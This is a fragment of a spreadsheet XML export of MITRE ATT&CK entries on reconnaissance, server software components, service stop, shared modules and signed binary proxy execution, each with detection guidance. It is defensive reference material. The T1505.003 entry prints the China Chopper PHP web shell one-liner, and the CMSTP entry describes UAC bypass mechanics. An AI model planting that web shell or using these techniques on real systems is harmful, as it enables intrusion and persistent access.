    <t>Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious. Network connections to the same destination that occur at the same time of day for multiple days are suspicious.</t>
  </si>
  <si>
    <t>T1113</t>
  </si>
  <si>
    <t>Screen Capture</t>
  </si>
  <si>
    <t xml:space="preserve">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&lt;code&gt;CopyFromScreen&lt;/code&gt;, &lt;code&gt;xwd&lt;/code&gt;, or &lt;code&gt;screencapture&lt;/code&gt;.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware)
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1113</t>
  </si>
  <si>
    <t>Monitoring for screen capture behavior will depend on the method used to obtain data from the operating system and write output files. Detection methods could include collecting information from unusual processes using API calls used to obtain image data, and monitoring for image files written to disk. The sensor data may need to be correlated with other events to identify malicious activity, depending on the legitimacy of this behavior within a given network environment.</t>
  </si>
  <si>
    <t>T1597</t>
  </si>
  <si>
    <t>Search Closed Sources</t>
  </si>
  <si>
    <t>Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
Adversaries may search in different closed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</si>
  <si>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https://attack.mitre.org/techniques/T1597</t>
  </si>
  <si>
    <t>T1597.002</t>
  </si>
  <si>
    <t>Search Closed Sources: Purchase Technical Data</t>
  </si>
  <si>
    <t>Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.
Adversaries may purchase information about their already identified targets, or use purchased data to discover opportunities for successful breaches. Threat actors may gather various technical details from purchased data, including but not limited to employee contact information, credentials, or specifics regarding a victim’s infrastructure.(Citation: ZDNET Selling Data) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)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[Valid Accounts](https://attack.mitre.org/techniques/T1078)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1597/002</t>
  </si>
  <si>
    <t>T1597.001</t>
  </si>
  <si>
    <t>Search Closed Sources: Threat Intel Vendors</t>
  </si>
  <si>
    <t>Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)
Adversaries may search in private threat intelligence vendor data to gather actionable information. Threat actors may seek information/indicators gathered about their own campaigns, as well as those conducted by other adversaries that may align with their target industries, capabilities/objectives, or other operational concerns. Information reported by vendors may also reveal opportunities other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1597/001</t>
  </si>
  <si>
    <t>T1596</t>
  </si>
  <si>
    <t>Search Open Technical Databases</t>
  </si>
  <si>
    <t>Adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans.(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS)(Citation: Medium SSL Cert)(Citation: SSLShopper Lookup)(Citation: DigitalShadows CDN)(Citation: Shodan)
Adversaries may search in different open databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)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</si>
  <si>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https://attack.mitre.org/techniques/T1596</t>
  </si>
  <si>
    <t>T1596.004</t>
  </si>
  <si>
    <t>Search Open Technical Databases: CDNs</t>
  </si>
  <si>
    <t>Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.
Adversaries may search CDN data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about content servers within a CDN. Adversaries may also seek and target CDN misconfigurations that leak sensitive information not intended to be hosted and/or do not have the same protection mechanisms (ex: login portals) as the content hosted on the organization’s website.(Citation: DigitalShadows CDN) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1596/004</t>
  </si>
  <si>
    <t>T1596.001</t>
  </si>
  <si>
    <t>Search Open Technical Databases: DNS/Passive DNS</t>
  </si>
  <si>
    <t>Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.
Adversaries may search DNS data to gather actionable information. Threat actors can query nameservers for a target organization directly, or search through centralized repositories of logged DNS query responses (known as passive DNS).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Adversaries may also seek and target DNS misconfigurations/leaks that reveal information about internal networks. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)),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</si>
  <si>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https://attack.mitre.org/techniques/T1596/001</t>
  </si>
  <si>
    <t>T1596.003</t>
  </si>
  <si>
    <t>Search Open Technical Databases: Digital Certificates</t>
  </si>
  <si>
    <t>Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.
Adversaries may search digital certificate data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about certificates.(Citation: SSLShopper Lookup) Digital certificate data may also be available from artifacts signed by the organization (ex: certificates used from encrypted web traffic are served with content).(Citation: Medium SSL Cert) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1596/003</t>
  </si>
  <si>
    <t>T1596.005</t>
  </si>
  <si>
    <t>Search Open Technical Databases: Scan Databases</t>
  </si>
  <si>
    <t>Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)
Adversaries may search scan databases to gather actionable information. Threat actors can use online resources and lookup tools to harvest information from these services. Adversaries may seek information about their already identified targets, or use these datasets to discover opportunities for successful breaches. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1596/005</t>
  </si>
  <si>
    <t>T1596.002</t>
  </si>
  <si>
    <t>Search Open Technical Databases: WHOIS</t>
  </si>
  <si>
    <t>Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)
Adversaries may search WHOIS data to gather actionable information. Threat actors can use online resources or command-line utilities to pillage through WHOIS data for information about potential victims. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1596/002</t>
  </si>
  <si>
    <t>T1593</t>
  </si>
  <si>
    <t>Search Open Websites/Domains</t>
  </si>
  <si>
    <t>Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
Adversaries may search in different online sites depending on what information they seek to gather.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[External Remote Services](https://attack.mitre.org/techniques/T1133) or [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1593</t>
  </si>
  <si>
    <t>T1593.002</t>
  </si>
  <si>
    <t>Search Open Websites/Domains: Search Engines</t>
  </si>
  <si>
    <t>Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
Adversaries may craft various search engine queries depending on what information they seek to gather. Threat actors may use search engines to harvest general information about victims, as well as use specialized queries to look for spillages/leaks of sensitive information such as network details or credentials.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[Valid Accounts](https://attack.mitre.org/techniques/T1078) or [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1593/002</t>
  </si>
  <si>
    <t>T1593.001</t>
  </si>
  <si>
    <t>Search Open Websites/Domains: Social Media</t>
  </si>
  <si>
    <t>Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.
Adversaries may search in different social media sites depending on what information they seek to gather. Threat actors may passively harvest data from these sites, as well as use information gathered to create fake profiles/groups to elicit victim’s into revealing specific information (i.e. [Spearphishing Service](https://attack.mitre.org/techniques/T1598/001)).(Citation: Cyware Social Media)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[Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1593/001</t>
  </si>
  <si>
    <t>T1594</t>
  </si>
  <si>
    <t>Search Victim-Owned Websites</t>
  </si>
  <si>
    <t>Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)
Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1594</t>
  </si>
  <si>
    <t>Monitor for suspicious network traffic that could be indicative of adversary reconnaissance, such as rapid successions of requests indicative of web crawling and/or large quantities of requests originating from a single source (especially if the source is known to be associated with an adversary). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.</t>
  </si>
  <si>
    <t>T1505</t>
  </si>
  <si>
    <t>Server Software Component</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</si>
  <si>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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1505</t>
  </si>
  <si>
    <t xml:space="preserve">Consider monitoring application logs for abnormal behavior that may indicate suspicious installation of application software components. Consider monitoring file locations associated with the installation of new application software components such as paths from which applications typically load such extensible components.
Process monitoring may be used to detect servers components that perform suspicious actions such as running cmd.exe or accessing files. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells) </t>
  </si>
  <si>
    <t>Application Log: Application Log Content, File: File Creation, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation</t>
  </si>
  <si>
    <t>T1505.001</t>
  </si>
  <si>
    <t>Server Software Component: SQL Stored Procedures</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse SQL stored procedures to establish persistent access to systems. SQL Stored Procedures are code that can be saved and reused so that database users do not waste time rewriting frequently used SQL queries. Stored procedures can be invoked via SQL statements to the database using the procedure name or via defined events (e.g. when a SQL server application is started/restarted).
Adversaries may craft malicious stored procedures that can provide a persistence mechanism in SQL database servers.(Citation: NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019) To execute operating system commands through SQL syntax the adversary may have to enable additional functionality, such as xp_cmdshell for MSSQL Server.(Citation: NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019)(Citation: Microsoft xp_cmdshell 2017) 
Microsoft SQL Server can enable common language runtime (CLR) integration. With CLR integration enabled, application developers can write stored procedures using any .NET framework language (e.g. VB .NET, C#, etc.).(Citation: Microsoft CLR Integration 2017) Adversaries may craft or modify CLR assemblies that are linked to stored procedures since these CLR assemblies can be made to execute arbitrary commands.(Citation: NetSPI SQL Server CLR) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1505/001</t>
  </si>
  <si>
    <t>12 December 2019</t>
  </si>
  <si>
    <t>On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation: NetSPI Startup Stored Procedures) Consider enabling audit features that can log malicious startup activities.</t>
  </si>
  <si>
    <t>Carlos Borges, @huntingneo, CIP; Kaspersky; Lucas da Silva Pereira, @vulcanunsec, CIP</t>
  </si>
  <si>
    <t>T1505.002</t>
  </si>
  <si>
    <t>Server Software Component: Transport Agent</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse Microsoft transport agents to establish persistent access to systems. Microsoft Exchange transport agents can operate on email messages passing through the transport pipeline to perform various tasks such as filtering spam, filtering malicious attachments, journaling, or adding a corporate signature to the end of all outgoing emails.(Citation: Microsoft TransportAgent Jun 2016)(Citation: ESET LightNeuron May 2019) Transport agents can be written by application developers and then compiled to .NET assemblies that are subsequently registered with the Exchange server. Transport agents will be invoked during a specified stage of email processing and carry out developer defined tasks. 
Adversaries may register a malicious transport agent to provide a persistence mechanism in Exchange Server that can be triggered by adversary-specified email events.(Citation: ESET LightNeuron May 2019) Though a malicious transport agent may be invoked for all emails passing through the Exchange transport pipeline, the agent can be configured to only carry out specific tasks in response to adversary defined criteria. For example, the transport agent may only carry out an action like copying in-transit attachments and saving them for later exfiltration if the recipient email address matches an entry on a list provided by the adversary. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1505/002</t>
  </si>
  <si>
    <t>Consider monitoring application logs for abnormal behavior that may indicate suspicious installation of application software components. Consider monitoring file locations associated with the installation of new application software components such as paths from which applications typically load such extensible components.</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, File: File Creation</t>
  </si>
  <si>
    <t xml:space="preserve"> Christoffer Strömblad; ESET</t>
  </si>
  <si>
    <t>T1505.003</t>
  </si>
  <si>
    <t>Server Software Component: Web Shell</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.
In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (ex: [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1505/003</t>
  </si>
  <si>
    <t>13 December 2019</t>
  </si>
  <si>
    <t xml:space="preserve">Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is the following short payload: (Citation: Lee 2013) 
&lt;code&gt;&amp;lt;?php @eval($_POST['password']);&amp;gt;&lt;/code&gt;
Nevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as running cmd.exe or accessing files that are not in the Web directory. File monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells) </t>
  </si>
  <si>
    <t>T1489</t>
  </si>
  <si>
    <t>Service Stop</t>
  </si>
  <si>
    <t>Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster) 
Adversaries may accomplish this by disabling individual services of high importance to an organization, such as &lt;code&gt;MSExchangeIS&lt;/code&gt;, which will make Exchange content inaccessible (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services or processes may not allow for modification of their data stores while running. Adversaries may stop services or processes in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1489</t>
  </si>
  <si>
    <t>29 March 2019</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments to see if critical processes are terminated or stop running.
Monitor for edits for modifications to services and startup programs that correspond to services of high importance. Look for changes to services that do not correlate with known software, patch cycles, etc. Windows service information is stored in the Registry at &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services&lt;/code&gt;. Systemd service unit files are stored within the /etc/systemd/system, /usr/lib/systemd/system/, and /home/.config/systemd/user/ directories, as well as associated symbolic links.
Alterations to the service binary path or the service startup type changed to disabled may be suspicious.
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, &lt;code&gt;ChangeServiceConfigW&lt;/code&gt; may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Termination, Service: Service Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1129</t>
  </si>
  <si>
    <t>Shared Modules</t>
  </si>
  <si>
    <t>Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows [Native API](https://attack.mitre.org/techniques/T1106) which is called from functions like &lt;code&gt;CreateProcess&lt;/code&gt;, &lt;code&gt;LoadLibrary&lt;/code&gt;, etc. of the Win32 API. (Citation: Wikipedia Windows Library Files)
The module loader can load DLLs:
* via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;
* via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);
* via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;
* via &lt;code&gt;&amp;#x3c;file name="filename.extension" loadFrom="fully-qualified or relative pathname"&amp;#x3e;&lt;/code&gt; in an embedded or external "application manifest". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT.
Adversaries may use this functionality as a way to execute arbitrary code on a victim system. For example, malware may execute share modules to load additional components or features.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1129</t>
  </si>
  <si>
    <t>Monitoring DLL module loads may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances, since benign use of Windows modules load functions are common and may be difficult to distinguish from malicious behavior. Legitimate software will likely only need to load routine, bundled DLL modules or Windows system DLLs such that deviation from known module loads may be suspicious. Limiting DLL module loads to &lt;code&gt;%SystemRoot%&lt;/code&gt; and &lt;code&gt;%ProgramFiles%&lt;/code&gt; directories will protect against module loads from unsafe paths. 
Correlation of other events with behavior surrounding module loads using API monitoring and suspicious DLLs written to disk will provide additional context to an event that may assist in determining if it is due to malicious behavior.</t>
  </si>
  <si>
    <t>T1218</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution</t>
  </si>
  <si>
    <t>Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed binaries. Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218</t>
  </si>
  <si>
    <t>20 January 2021</t>
  </si>
  <si>
    <t>Monitor processes and command-line parameters for signed binaries that may be used to proxy execution of malicious files. Compare recent invocations of signed binaries that may be used to proxy execution with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Legitimate programs used in suspicious ways, like msiexec.exe downloading an MSI file from the Internet, may be indicative of an intrusion. Correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.
Monitor for file activity (creations, downloads, modifications, etc.), especially for file types that are not typical within an environment and may be indicative of adversary activity.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, Module: Module Load, Network Traffic: Network Connection Creation, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Hans Christoffer Gaardløs; Nishan Maharjan, @loki248; Praetorian</t>
  </si>
  <si>
    <t>Anti-virus, Application control, Digital Certificate Validation</t>
  </si>
  <si>
    <t>T1218.003</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution: CMSTP</t>
  </si>
  <si>
    <t>Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017)  and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate, signed Microsoft application.
CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/003</t>
  </si>
  <si>
    <t>Use process monitoring to detect and analyze the execution and arguments of CMSTP.exe. Compare recent invocations of CMSTP.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity.
Sysmon events can also be used to identify potential abuses of CMSTP.exe. Detection strategy may depend on the specific adversary procedure, but potential rules include: (Citation: Endurant CMSTP July 2018)
* To detect loading and execution of local/remote payloads - Event 1 (Process creation) where ParentImage contains CMSTP.exe and/or Event 3 (Network connection) where Image contains CMSTP.exe and DestinationIP is external.
* To detect [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) via an auto-elevated COM interface - Event 10 (ProcessAccess) where CallTrace contains CMLUA.dll and/or Event 12 or 13 (RegistryEvent) where TargetObject contains CMMGR32.exe. Also monitor for events, such as the creation of processes (Sysmon Event 1), that involve auto-elevated CMSTP COM interfaces such as CMSTPLUA (3E5FC7F9-9A51-4367-9063-A120244FBEC7) and CMLUAUTIL (3E000D72-A845-4CD9-BD83-80C07C3B881F).</t>
  </si>
  <si>
    <t>Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>Nik Seetharaman, Palantir; Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank</t>
  </si>
  <si>
    <t>T1218.001</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution: Compiled HTML File</t>
  </si>
  <si>
    <t>Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)
A custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/001</t>
  </si>
  <si>
    <t>Monitor and analyze the execution and arguments of hh.exe. (Citation: MsitPros CHM Aug 2017) Compare recent invocations of hh.exe with prior history of known good arguments to determine anomalous and potentially adversarial activity (ex: obfuscated and/or malicious commands). Non-standard process execution trees may also indicate suspicious or malicious behavior, such as if hh.exe is the parent process for suspicious processes and activity relating to other adversarial techniques.
Monitor presence and use of CHM files, especially if they are not typically used within an environment.</t>
  </si>
  <si>
    <t>Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International</t>
  </si>
  <si>
    <t>Application control, Digital Certificate Validation</t>
  </si>
  <si>
    <t>T1218.002</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution: Control Panel</t>
  </si>
  <si>
    <t>Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.
Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a &lt;code&gt;CPlApplet&lt;/code&gt; function.(Citation: Microsoft Implementing CPL)(Citation: TrendMicro CPL Malware Jan 2014) For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.(Citation: Microsoft Implementing CPL) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.(Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013)
Malicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns(Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware.(Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.
Adversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls&lt;/code&gt;. Even when these registered DLLs do not comply with the CPL file specification and do not export &lt;code&gt;CPlApplet&lt;/code&gt; functions, they are loaded and executed through its &lt;code&gt;DllEntryPoint&lt;/code&gt; when Control Panel is executed. CPL files not exporting &lt;code&gt;CPlApplet&lt;/code&gt; are not directly executable.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/002</t>
  </si>
  <si>
    <t>Monitor and analyze activity related to items associated with CPL files, such as the control.exe and the &lt;code&gt;Control_RunDLL&lt;/code&gt; and &lt;code&gt;ControlRunDLLAsUser&lt;/code&gt; API functions in shell32.dll. When executed from the command line or clicked, control.exe will execute the CPL file (ex: &lt;code&gt;control.exe file.cpl&lt;/code&gt;) before [Rundll32](https://attack.mitre.org/techniques/T1218/011) is used to call the CPL's API functions (ex: &lt;code&gt;rundll32.exe shell32.dll,Control_RunDLL file.cpl&lt;/code&gt;). CPL files can be executed directly via the CPL API function with just the latter [Rundll32](https://attack.mitre.org/techniques/T1218/011) command, which may bypass detections and/or execution filters for control.exe.(Citation: TrendMicro CPL Malware Jan 2014)
Inventory Control Panel items to locate unregistered and potentially malicious files present on systems:
* Executable format registered Control Panel items will have a globally unique identifier (GUID) and registration Registry entries in &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace&lt;/code&gt; and &lt;code&gt;HKEY_CLASSES_ROOT\CLSID\{GUID}&lt;/code&gt;. These entries may contain information about the Control Panel item such as its display name, path to the local file, and the command executed when opened in the Control Panel. (Citation: Microsoft Implementing CPL)
